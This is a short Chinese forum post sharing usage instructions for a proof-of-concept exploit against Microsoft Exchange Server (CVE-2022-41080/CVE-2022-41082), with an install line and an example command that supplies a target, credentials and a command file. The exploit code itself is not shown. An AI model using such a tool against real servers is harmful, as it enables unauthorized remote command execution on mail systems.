TA的每日心情 | 擦汗 前天 20:42 |
---|
签到天数: 1380 天 [LV.10]以坛为家III
|
Microsoft Exchange Server CVE-2022-41080/CVE-2022-41082
网上看到的,分享给大家,仅限学习,他果自负。
- pip install -r requirements.txt
复制代码
- usage: python poc.py [-H Target] [-u username] [-p "password"] [-c cmd_file]
- python poc.py -H https://192.168.0.1 -u user2 -p "123QWEasd!@#" -c cmd_file'
复制代码
|
|